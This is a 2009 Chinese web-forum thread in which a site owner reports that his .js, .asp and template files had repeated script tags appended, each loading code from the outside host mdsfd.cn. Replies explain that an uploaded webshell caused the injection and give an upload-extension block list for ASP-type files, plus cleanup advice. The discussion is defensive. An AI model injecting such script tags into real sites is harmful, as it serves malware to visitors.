我的网站又被挂马了。3月23日

vlonzhu · 发表于 2009-3-23 12:34:30

http://www.zjkzhaopin.com

所有的。js文件和index。asp和top.asp文件。

Templates/Default/中的.html文件

后面都被添加

<script  src=http://mdsfd.cn></script>
<script  src=http://mdsfd.cn></script>
<script  src=http://mdsfd.cn></script>
<script  src=http://mdsfd.cn></script>
<script  src=http://mdsfd.cn></script>

求正解，着急。

dillong · 发表于 2009-3-23 13:20:45

不会吧。又被挂了？？/呵呵。

admin · 发表于 2009-3-23 18:17:22

这个挂马是你网站里边被上传了木马文件，然后木马文件批量挂马

vlonzhu · 发表于 2009-3-24 13:49:09

管理员，如何避免这类事情的发生呢？

zhoueh888 · 发表于 2009-3-24 15:20:45

应该是那个编辑器里面的upload.asp里面代码去改一下。
找到里面代码sAllowExt = Replace(UCase(sAllowExt), \"ASP\", \"\")这一段，把他改成
sAllowExt = UCase(sAllowExt)
Do While InStr(sAllowExt, \"ASP\") or InStr(sAllowExt, \"CER\") or InStr(sAllowExt, \"ASA\") or InStr(sAllowExt, \"CDX\") or InStr(sAllowExt, \"HTR\") Or InStr(sAllowExt, \"ASPX\")
      sAllowExt = Replace(sAllowExt, \"ASP\", \"\")
      sAllowExt = Replace(sAllowExt, \"CER\", \"\")
      sAllowExt = Replace(sAllowExt, \"ASA\", \"\")
      sAllowExt = Replace(sAllowExt, \"CDX\", \"\")
      sAllowExt = Replace(sAllowExt, \"HTR\", \"\")
      sAllowExt = Replace(sAllowExt, \"ASPX\", \"\")
   Loop

这样应该就不会了。当然你不能断定如果你自己改了代码，正好有漏洞，那就不知道了。

zhoueh888 · 发表于 2009-3-24 15:22:37

忘了说一句，你要先找到上传到你空间上面的木马文件，一般是在上传文件的目录里面，你去找找看，是不是有什么后缀是asa、asp、aspx等之类的文件，下载下来看看，全部删掉。

yaya725 · 发表于 2009-3-24 16:04:48

账号		自动登录	找回密码
密码			注册会员

我的网站又被挂马了。3月23日

社区居民

新人进步